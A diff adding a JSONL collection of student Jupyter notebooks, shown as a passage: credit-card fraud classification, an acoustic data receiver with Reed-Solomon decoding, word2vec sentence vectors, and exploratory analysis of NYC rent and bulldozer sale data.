diff --git "a/4414.jsonl" "b/4414.jsonl" new file mode 100644--- /dev/null +++ "b/4414.jsonl" @@ -0,0 +1,663 @@ +{"seq_id":"30355795352","text":"# Import Functions \n\n# +\n# #!conda install -y -c conda-forge xgboost\n\n# +\n#pip install geopy\n\n#DF/EDA imports\nimport geopy.distance\nimport pandas as pd\nimport numpy as np\n\n#plotting imports\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nplt.style.use('fivethirtyeight')\n# %matplotlib inline\nimport matplotlib.cm as cm\n\n#modeling imports\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import precision_score, recall_score, accuracy_score, roc_auc_score, roc_curve\nfrom sklearn.metrics import precision_recall_curve,f1_score, fbeta_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import StandardScaler\nimport xgboost as xgb\n# -\n\n# Importing/Cleaning Data and EDA \n\ndf = pd.read_csv('cc_fraud.csv')\n\ndf.head()\n\ndf['name'] = df['first'] + \" \" + df['last']\n\ndf = df.drop(columns = [\"Unnamed: 0\", \"first\" , \"last\" , \"trans_num\"])\n\nlen(df['name'].unique())\n\n(df.is_fraud == 1).sum()\n\npercent_fraud = 2145 / 555719\nprint(percent_fraud)\nprint(1 - percent_fraud)\n\n# Adding Features: \"Purchase Distance\" ,\"Time Since Last Purchase\", and \"Cumulative Fraud\" \n\nlat_list = list(df[\"lat\"])\nlong_list = list(df[\"long\"])\nmerch_lat_list = list(df[\"merch_lat\"])\nmerch_long_list = list(df[\"merch_long\"])\n\n\ndef distance_from_merch(lat1 , lat2 , long1 , long2):\n coords_1 = (lat1, long1)\n coords_2 = (lat2, long2)\n return geopy.distance.distance(coords_1, coords_2).miles\n\n\ndistance_list = []\nfor idx, x in enumerate(lat_list):\n distance_list.append(distance_from_merch(lat_list[idx], merch_lat_list[idx], long_list[idx], merch_long_list[idx]))\n \n\ndf[\"Purchase_Distance\"] = distance_list\n\ndf = df.drop(columns = [\"lat\", \"long\" , \"merch_lat\" , \"merch_long\", 'cc_num' , 'street' , 'city' , 'state'])\n\ndf['time_since_prev_purchase'] = df.groupby('name')['unix_time'].diff()\n\ndf['cumulative_fraud'] = df.groupby('name')['is_fraud'].cumsum()\n\ndf = df.drop(columns = [\"trans_date_trans_time\", \"unix_time\" , 'job'])\n\n# Exploring Updated Data Frame \n\nfraud_df = df[df.is_fraud != 0]\n#fraud_df\n\nana_df = df[df.name == \"Ana Howell\"]\n#ana_df[ana_df.is_fraud == 1]\n\nscamees = (df.loc[df['name'].isin(fraud_df.name.unique())])\nscamees.describe()\n\nlen(scamees['name'].unique())\n\ndf.describe()\n\nfraud_df.describe()\n\n# Things to note: no real difference with purchase-distance, amount is on average much higher for fraud, \n# time since previous purchase tends to be much lower for fraud as well. \n# Will explore these two features with cumulative fraud\n\n# Exploring a Pair Plot \n\nsns.pairplot(df, hue='is_fraud')\n\ndf = df.dropna()\ndf.head()\n\n\n\ndf = pd.get_dummies(df, columns = [\"category\" , \"gender\"] , drop_first = True)\n\n# KNN Modeling \n\ndf.columns\n\n'''\nknn_X = df[['amt', 'zip',\n 'time_since_prev_purchase', 'cumulative_fraud',\n 'category_food_dining', 'category_gas_transport',\n 'category_grocery_net', 'category_grocery_pos',\n 'category_health_fitness', 'category_home', 'category_kids_pets',\n 'category_misc_net', 'category_misc_pos', 'category_personal_care',\n 'category_shopping_net', 'category_shopping_pos', 'category_travel']]\n'''\nknn_X = df[['amt', 'time_since_prev_purchase', 'cumulative_fraud']]\nknn_y = df['is_fraud']\n\nknn_X_train, knn_X_test, knn_y_train, knn_y_test = train_test_split(knn_X, knn_y, test_size=0.2, random_state=42)\n\nknn = KNeighborsClassifier(n_neighbors=50)\nknn.fit(knn_X_train, knn_y_train)\nknn_y_pred = knn.predict(knn_X_test)\nprint(metrics.accuracy_score(knn_y_test, knn_y_pred))\n\n# +\nknn = KNeighborsClassifier(n_neighbors=100)\nacc_scores = cross_val_score(knn, knn_X_train, knn_y_train, cv=10, scoring='accuracy')\nprec_scores = cross_val_score(knn, knn_X_train, knn_y_train, cv=10, scoring='precision')\nrec_scores = cross_val_score(knn, knn_X_train, knn_y_train, cv=10, scoring='recall')\n\nprint(\"Accuracy: \" , acc_scores, \"\\n\", \"Precision: \", prec_scores, \"\\n\", \"Recall: \", rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(knn_y_train, knn.predict_proba(knn_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves KNN');\n\n\n# -\n\ndef knn_confusion_matrix(model, threshold=0.5):\n knn_y_predict = (model.predict_proba(knn_X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(knn_y_train, knn_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n plt.title('KNN Matrix');\n\n\n# +\nfrom ipywidgets import interactive, FloatSlider\n\ninteractive(lambda threshold: knn_confusion_matrix(knn, threshold), threshold=(0,1.0000,0.0001))\n# -\n\n\n\n\n\n\n\n# Logistic Modeling \n\nlog_X = df[['amt', 'time_since_prev_purchase', 'cumulative_fraud']]\nlog_y = df['is_fraud']\n\nlog_X_train, log_X_test, log_y_train, log_y_test = train_test_split(log_X, log_y, random_state=42)\nlm = LogisticRegression(C = 10, max_iter=1000)\nlm.fit(log_X_train, log_y_train)\n\nlog_acc_scores = cross_val_score(lm, log_X_train, log_y_train, cv=10, scoring='accuracy')\nlog_prec_scores = cross_val_score(lm, log_X_train, log_y_train, cv=10, scoring='precision')\nlog_rec_scores = cross_val_score(lm, log_X_train, log_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , log_acc_scores, \"\\n\", \"Precision: \", log_prec_scores, \"\\n\", \"Recall: \", log_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(log_y_train, lm.predict_proba(log_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Logistic Regression');\n\n\n# +\ndef log_confusion_matrix(model, threshold=0.5):\n log_y_predict = (model.predict_proba(log_X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(log_y_train, log_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n plt.title('Log Matrix');\n \ninteractive(lambda threshold: log_confusion_matrix(lm, threshold), threshold=(0,1.0000,0.0001))\n# -\n\nweighted_lm = LogisticRegression(class_weight={1 : 300, 0 : 1}, solver='liblinear')\nweighted_lm.fit(log_X_train, log_y_train)\n\n\nw_log_acc_scores = cross_val_score(weighted_lm, log_X_train, log_y_train, cv=10, scoring='accuracy')\nw_log_prec_scores = cross_val_score(weighted_lm, log_X_train, log_y_train, cv=10, scoring='precision')\nw_log_rec_scores = cross_val_score(weighted_lm, log_X_train, log_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , w_log_acc_scores, \"\\n\", \"Precision: \", w_log_prec_scores, \"\\n\", \"Recall: \", w_log_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(log_y_train, weighted_lm.predict_proba(log_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Log Weighted');\n# -\n\ninteractive(lambda threshold: log_confusion_matrix(weighted_lm, threshold), threshold=(0,1.0000,0.0001))\n\n\n\n# Decision Tree and Random Forest \n\ndt_X = df[['amt', 'time_since_prev_purchase', 'cumulative_fraud']]\ndt_y = df['is_fraud']\n\ndt_X_train, dt_X_test, dt_y_train, dt_y_test = train_test_split(dt_X, dt_y, random_state=42)\ndt = DecisionTreeClassifier(max_depth=10)\ndt.fit(dt_X_train, dt_y_train)\n\ndt_acc_scores = cross_val_score(dt, dt_X_train, dt_y_train, cv=10, scoring='accuracy')\ndt_prec_scores = cross_val_score(dt, dt_X_train, dt_y_train, cv=10, scoring='precision')\ndt_rec_scores = cross_val_score(dt, dt_X_train, dt_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , dt_acc_scores, \"\\n\", \"Precision: \", dt_prec_scores, \"\\n\", \"Recall: \", dt_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(dt_y_train, dt.predict_proba(dt_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Decision Tree');\n\n\n# -\n\ndef dt_confusion_matrix(model, threshold=0.5):\n dt_y_predict = (model.predict_proba(dt_X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(dt_y_train, dt_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n\n\ninteractive(lambda threshold: dt_confusion_matrix(dt, threshold), threshold=(0,1.0000,0.0001))\n\nrf = RandomForestClassifier(n_estimators=100)\nrf.fit(dt_X_train, dt_y_train)\n\nrf_acc_scores = cross_val_score(rf, dt_X_train, dt_y_train, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(rf, dt_X_train, dt_y_train, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(rf, dt_X_train, dt_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(dt_y_train, rf.predict_proba(dt_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Random Forest');\n# -\n\ninteractive(lambda threshold: dt_confusion_matrix(rf, threshold), threshold=(0,1.0000,0.0001))\n\nrf_acc_scores = cross_val_score(rf, dt_X_test, dt_y_test, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(rf, dt_X_test, dt_y_test, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(rf, dt_X_test, dt_y_test, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n\n# +\ndef test_confusion_matrix(model, threshold=0.5):\n dt_y_predict = (model.predict_proba(dt_X_test)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(dt_y_test, dt_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n \ninteractive(lambda threshold: test_confusion_matrix(weighted_rf, threshold), threshold=(0,1.0000,0.0001))\n# -\n\nweighted_rf = RandomForestClassifier(n_estimators=100, class_weight={1 : 300, 0 : 1})\nweighted_rf.fit(dt_X_train, dt_y_train)\n\nrf_acc_scores = cross_val_score(weighted_rf, dt_X_train, dt_y_train, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(weighted_rf, dt_X_train, dt_y_train, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(weighted_rf, dt_X_train, dt_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(dt_y_train, weighted_rf.predict_proba(dt_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves');\n# -\n\ninteractive(lambda threshold: dt_confusion_matrix(weighted_rf, threshold), threshold=(0,1.0000,0.0001))\n\n\n# Trying Gradient Boosting and Evaluating Metrics \n\ndef rmse(actuals, preds):\n return np.sqrt(((actuals - preds) ** 2).mean())\n\n\nrmse(rf.predict(dt_X_test), dt_y_test)\n\n# +\ngbm = xgb.XGBRegressor( \n n_estimators=10000, \n max_depth=10,\n objective=\"reg:squarederror\", \n learning_rate=.01, \n subsample=1,\n min_child_weight=1,\n colsample_bytree=.8\n )\n\neval_set=[(dt_X_train, dt_y_train),(dt_X_test,dt_y_test)]\nfit_model = gbm.fit( \n dt_X_train, dt_y_train, \n eval_set=eval_set,\n eval_metric='rmse',\n early_stopping_rounds=30,\n verbose = True \n )\nrmse(gbm.predict(dt_X_test, ntree_limit=gbm.best_ntree_limit),dt_y_test)\n\n# -\n\nmodel = gbm.best_ntree_limit\nmodel\n\n\n\nxgb.plot_importance(gbm)\nxgb.plot_importance(gbm, importance_type='gain')\n\ngbm.get_booster().get_score(importance_type='weight')\n\ngbm.get_booster().get_score(importance_type='gain')\n\ngbm.get_booster().get_score(importance_type='cover')\n\n\n\n\n\nX = df[['amt',\n 'time_since_prev_purchase', 'cumulative_fraud',\n 'category_food_dining', 'category_gas_transport',\n 'category_grocery_net', 'category_grocery_pos',\n 'category_health_fitness', 'category_home', 'category_kids_pets',\n 'category_misc_net', 'category_misc_pos', 'category_personal_care',\n 'category_shopping_net', 'category_shopping_pos', 'category_travel']]\n\nX_train, X_test, y_train, y_test = train_test_split(X, dt_y, random_state=42)\nrf_1 = RandomForestClassifier(n_estimators=100)\nrf_1.fit(X_train, y_train)\n\nrf_acc_scores = cross_val_score(rf_1, X_train, y_train, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(rf_1, X_train, y_train, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(rf_1, X_train, y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(y_train, rf_1.predict_proba(X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves');\n\n\n# -\n\ndef rf_1_confusion_matrix(model, threshold=0.5):\n y_predict = (model.predict_proba(X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(y_train, y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n\n\ninteractive(lambda threshold: rf_1_confusion_matrix(rf_1, threshold), threshold=(0,1.0000,0.0001))\n\n\ndef rf_test_confusion_matrix(model, threshold=0.5):\n y_predict = (model.predict_proba(X_test)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(y_test, y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n\n\ninteractive(lambda threshold: rf_test_confusion_matrix(rf_1, threshold), threshold=(0,1.0000,0.0001))\n\n493 / (493 + 35)\n\n# +\ngbm = xgb.XGBRegressor( \n n_estimators=10000, \n max_depth=10,\n objective=\"reg:squarederror\", \n learning_rate=.01, \n subsample=1,\n min_child_weight=1,\n colsample_bytree=.8\n )\n\neval_set=[(X_train, y_train),(X_test, y_test)]\nfit_model = gbm.fit( \n X_train, y_train, \n eval_set=eval_set,\n eval_metric='rmse',\n early_stopping_rounds=30,\n verbose = True \n )\n# -\n\nxgb.plot_importance(gbm)\nxgb.plot_importance(gbm, importance_type='gain')\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Mitchell-Seiter/Project_4_Classification_Fraud_Detection","sub_path":"Updated_Project_4.ipynb","file_name":"Updated_Project_4.ipynb","file_ext":"py","file_size_in_byte":17098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"595251961","text":"import sounddevice as sd\nfrom pam import SoundCommunication\nfrom testing import Tester\nimport unireedsolomon.rs as rs\n\n# sampling rate\nFS = 44100\n\n\ndef str2bits(str):\n res = bin(int.from_bytes(str.encode('ascii'), 'big'))[2:]\n return '0'*(8 - (len(res) % 8)) + res\n\n\ndef bits2str(bits):\n r = b''\n for i in range(0, len(bits), 8):\n r += int(bits[i:i+8], 2).to_bytes(1, 'big')\n return r.decode('latin_1')\n\n\ndef save2file(file_name, text):\n with open(file_name, \"w\", encoding = \"utf8\" ) as f:\n print(text, file=f)\n\n\ndef bits2Str(bits):\n res = []\n for i in np.arange(0,len(bits),8):\n res.append(int(bits[i:i+8],2))\n return bytes(res).decode()\n\n\ndef decode_rs(msg):\n rs_coder = rs.RSCoder(255,185)\n return rs_coder.decode(msg)[0]\n\n\n# +\nW = sd.rec(int(10 * FS), channels=1, samplerate=FS, blocking=True).ravel()\n# msgSymLen has to be increased to a max\ncomm = SoundCommunication(FS, 200, 1000, 2000, msgSymLen = 2328)\nwr = comm.decode(W)\n\nmsg = bits2Str(wr)\nreceived_text = decode_rs(msg)\n\n\nmerge_lines = lambda text, l: l if not text else text + l\n\nwith open(\"text.txt\") as f:\n lines = f.readlines()\n text = reduce(merge_lines, lines, '')\n\nrt = received_text.split()\nt = text.split()\nN = min(len(rt),len(t))\n\nerror = 0\n\nfor i in range(N):\n if (rt[i] != t[i]):\n error += 1\n\nprint(\"Total number of differences is :\", error)\n\nsave2file('received.txt', received_text)\n# -\n\n\n","repo_name":"korel-one/over_the_air","sub_path":"receiver.ipynb","file_name":"receiver.ipynb","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"36104193458","text":"# + [markdown] id=\"IWKLJTPWjv-w\"\n# # word2vec: How To Prep Word Vectors For Modeling\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"3s27a8tolCF3\" outputId=\"3d74fd25-f67e-4215-9bf2-6610de74d9e0\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + [markdown] id=\"4CULosXzjv-6\"\n# ### Train Our Own Model\n\n# + id=\"Mh7m1bjxjv-9\"\n# Read in the data, clean it, split it into train and test sets, and then train a word2vec model\nimport gensim\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\npd.set_option('display.max_colwidth', 100)\n\nmessages = pd.read_csv('/content/drive/MyDrive/Colab Notebooks/LinkedIn Learning/03_Advanced NLP with Python for Machine Learning/Ex_Files_Adv_NLP_Python_ML/Exercise Files/data/spam.csv', encoding='latin-1')\nmessages = messages.drop(labels = [\"Unnamed: 2\", \"Unnamed: 3\", \"Unnamed: 4\"], axis = 1)\nmessages.columns = [\"label\", \"text\"]\n\n\nmessages['text_clean'] = messages['text'].apply(lambda x: gensim.utils.simple_preprocess(x))\nX_train, X_test, y_train, y_test = train_test_split(messages['text_clean'],\n messages['label'], test_size=0.2)\n\nw2v_model = gensim.models.Word2Vec(X_train,\n vector_size=100,\n window=5,\n min_count=2)\n\n# + [markdown] id=\"fpPmP-Wvjv_C\"\n# ### Prep Word Vectors\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"VfSIRgB4jv_E\" outputId=\"6aee2944-16ea-46b2-f17c-325f5187030e\"\n# Generate a list of words the word2vec model learned word vectors for\nw2v_model.wv.index_to_key\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"I5aNisWujv_I\" outputId=\"9e729516-01c1-43b8-f7cf-c58f55dd8676\"\n# Generate aggregated sentence vectors based on the word vectors for each word in the sentence\nw2v_vect = np.array([np.array([w2v_model.wv[i] for i in ls if i in w2v_model.wv.index_to_key ])\n for ls in X_test])\n\n# here 1st for ls in X_test is executed\n\n# then for i in ls if i in w2v_model.wv.index2word is executed\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"k3NxKivFjv_J\" outputId=\"13de5745-35b3-49fc-b763-79d3d7924210\"\n# Why is the length of the sentence different than the length of the sentence vector?\nfor i, v in enumerate(w2v_vect):\n print(len(X_test.iloc[i]), len(v))\n\n# + id=\"L15qW2D_jv_K\"\n# Compute sentence vectors by averaging the word vectors for the words contained in the sentence\nw2v_vect_avg = []\n\nfor vect in w2v_vect:\n if len(vect)!=0:\n w2v_vect_avg.append(vect.mean(axis=0))\n else:\n w2v_vect_avg.append(np.zeros(100))\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"hVj0M5D8jv_L\" outputId=\"5a425587-b5b0-44d3-cc41-55a2e0594a4a\"\n# Are our sentence vector lengths consistent?\nfor i, v in enumerate(w2v_vect_avg):\n print(len(X_test.iloc[i]), len(v))\n\n# + id=\"dqtNMj7Fjv_M\"\n\n","repo_name":"Ajimct007/learning","sub_path":"LinkedIn_Learning/03_Advanced NLP with Python for Machine Learning/02_Word2vec/02_Prepare_word2vec_for_model.ipynb","file_name":"02_Prepare_word2vec_for_model.ipynb","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"15686824458","text":"# +\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# %config InlineBackend.figure_format = \"retina\"\n# -\n\ndf_rent = pd.read_json('data/train.json')\n\ndf = df_rent[(df_rent['price'] <= 10_000) & (df_rent['price'] > 100)].copy()\n\ndf[\"bathrooms\"].value_counts()\n\ndf[df['bathrooms'] == 10]\n\ndf.loc[df['bathrooms'] == 10, 'bathrooms'] = 1\n\n# +\nfig, ax = plt.subplots(figsize = (3, 3))\n\nax.scatter(df['longitude'], df['latitude'], s = 1.5)\n\nplt.show()\n# -\n\ndf_rent[[\"longitude\", \"latitude\"]].describe()\n\nsum(df_rent['latitude'] == 0), sum(df_rent['longitude'] == 0), len(df_rent)\n\ndf_rent[df_rent['latitude'] == 0]['street_address']\n\n# Use latitude and longitude box of 40.55, -74.1 and 40.94, -73.67 on the upper right\n\ndf = df[(df['latitude']>40.55)&(df['latitude']<40.94) & \n (df['longitude'] >= -74.1) & (df['longitude']<=-73.67)].copy()\n\nlen(df), len(df_rent)\n\n# +\nfig, ax = plt.subplots(figsize = (7, 6))\n\nm = ax.scatter(df['longitude'], df['latitude'], s = 1.5, \n alpha = 0.5, \n cmap = \"rainbow\",\n c = df['price'], \n vmax = 4000, \n vmin = 1000, \n marker = '.')\n\nplt.colorbar(m)\nplt.show()\n# -\n\n# ## Exercise 2\n\n# +\nfig, ax = plt.subplots(figsize = (7, 6))\nm = ax.scatter(df['longitude'], df['latitude'], s = 1.5, \n alpha = 0.5, \n cmap = \"twilight\",\n c = df['price'], \n vmax = 4000, \n vmin = 2000, \n marker = '.')\n\nplt.colorbar(m)\nplt.show()\n# -\n\ndf.info()\n\ndf['created'] = pd.to_datetime(df['created'])\n\ndf['created'].dt.dayofweek\n\ndf['day'] = df['created'].dt.dayofweek\n\n# +\ndays = ['Mon','Tue','Wed',\"Thu\",'Fri','Sat','Sun']\nfig, ax = plt.subplots(figsize = (3, 3))\n\nax.hist(df['day'], bins = range(7 + 1), align = 'left')\nax.set_xticks(range(7))\nax.set_xticklabels(days)\n\nplt.show()\n# -\n\ndaycounts = df.groupby('day').count()['price']\n\n# +\ndays = ['Mon','Tue','Wed',\"Thu\",'Fri','Sat','Sun']\nfig, ax = plt.subplots(figsize = (3, 3))\n\nax.bar(range(7), daycounts)\nax.set_xticks(range(7))\nax.set_xticklabels(days)\n\nplt.show()\n# -\n\n# use pd.cut for continuous data instead of discrete data like this for days of the week\n\ndf_counts = df.groupby(['day', 'interest_level']).count()['price']\ndf_counts\n\ndf[(df['day'] == 0) & (df['interest_level'] == 'low')].count()[0]\n\nlow = df_counts.loc[:,'low'].values\nmed = df_counts.loc[:,'medium'].values\nhigh = df_counts.loc[:,'high'].values\n\nlow, med, high\n\n# +\nfig, ax = plt.subplots()\n\nw = .25\nax.bar(np.arange(7)-w, low, width = w, label = \"low\")\nax.bar(np.arange(7), med, width = w, label = \"med\")\nax.bar(np.arange(7)+w, high, width = w, label = \"high\")\nax.set_xticklabels([None, \"Mon\", \"Tue\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"])\n\nplt.legend()\nplt.show()\n# -\n\n# ## Exercise 3\n\ndf_counts.loc[:,['low', 'medium']].values\n\n# +\nfig, ax = plt.subplots()\n\n\nax.hist(df.groupby('manager_id').count()['price'], bins = 100)\n\n\nplt.show()\n# -\n\navg_mgr_prices = df.groupby('manager_id').mean()['price']\navg_mgr_prices\n\n# +\nfig, ax = plt.subplots()\n\n\nax.hist(avg_mgr_prices, bins = 100)\n\n\nplt.show()\n# -\n\ndf['features'] = df['features'].astype(str)\n\ndf['features'] = df['features'].str.lower()\ndf['features']\n\ndf['doorman'] = df['features'].str.contains('doorman')\ndf['laundry'] = df['features'].str.contains('laundry')\ndf['parking'] = df['features'].str.contains('parking')\ndf['hardwood'] = df['features'].str.contains('hardwood')\n\ndf.loc[~df['doorman'], 'price'].mean(), df.loc[df['doorman'], 'price'].mean()\n\ndf.groupby(\"doorman\").mean()['price']\n\ndf.groupby(\"laundry\").mean()['price']\n\ndf.groupby(\"parking\").mean()['price']\n\ndf.groupby(\"hardwood\").mean()['price']\n\nhoods = {\n \"hells\" : [40.7622, -73.9924],\n \"astoria\" : [40.7796684, -73.9215888],\n \"Evillage\" : [40.723163774, -73.984829394],\n \"LowerEast\" : [40.715033, -73.9842724],\n \"UpperEast\" : [40.768163594, -73.959329496],\n \"financial\" : [40.703830518, -74.005666644],\n}\n\nnp.abs(df.latitude - hoods[\"hells\"][0]) + np.abs(df.longitude - hoods['hells'][1])\n\nfor hood, l in hoods.items(): \n df[hood] = np.abs(df.latitude - l[0]) + np.abs(df.longitude - l[1])\n\ndf.T\n\ncorrs = []\nfor hood, l in hoods.items(): \n corr = np.corrcoef(df[hood], df['price'])\n corr = corr[0, 1]\n corrs.append(corr)\n print(f\"Hood {hood} correlation with price: {corr:.3f}\")\ndf_corr = pd.DataFrame(data = corrs, columns = ['correlation'], index = hoods.keys())\n\ndf_corr.sort_values(\"correlation\")\n\n# +\nfig, axes = plt.subplots(nrows = 3, ncols = 2, figsize = (8, 6), sharey=True, sharex=True)\n\naxes = axes.flatten()\nfor i, hodd in enumerate(df_corr.index): \n axes[i].scatter(df[hood], df['price'], s = 3, alpha = 0.05, c = '#4574B4')\n axes[i].set_xlabel(f\"Distance to {hood}\")\n axes[i].set_ylabel(\"Price\")\n \nplt.tight_layout()\n\nplt.show()\n# -\n\n# # Bulldozer\n\ndf_bull = pd.read_csv('data/Train.csv', parse_dates = ['saledate'])\n\ndf_bull.info()\n\ndf_bull = df_bull.sort_values('saledate')\n\ndf_bull = df_bull.set_index('SalesID')\ndf_bull\n\ndf_bull.isnull().sum() / len(df_bull) * 100\n\ndf_bull.iloc[0][['Ripper', 'Backhoe_Mounting', 'Travel_Controls']]\n\ndf_bull['Tire_Size'].unique()\n\ndf = df_bull.copy()\n\ndf['ProductGroup'].unique()\n\ndf['Drive_System'].unique()\n\ndf['Backhoe_Mounting'].unique()\n\n\ndef df_normalize_strings(df, col):\n \"\"\"standard take create one nan value (so its consistent)\"\"\"\n df[col] = df[col].str.lower()\n df[col] = df[col].fillna(np.nan) # make None -> np.nan\n df[col] = df[col].replace('none or unspecified', np.nan)\n df[col] = df[col].replace('none', np.nan)\n df[col] = df[col].replace('no', np.nan)\n df[col] = df[col].replace('#name?', np.nan)\n df[col] = df[col].replace('', np.nan)\n\n\ndf_normalize_strings(df, 'ProductGroup')\ndf_normalize_strings(df, 'Drive_System')\ndf_normalize_strings(df, 'Backhoe_Mounting')\n\ndf['ProductGroup'] = df['ProductGroup'].astype('category')\ndf['Drive_System'] = df['Drive_System'].astype('category')\ndf['Backhoe_Mounting'] = 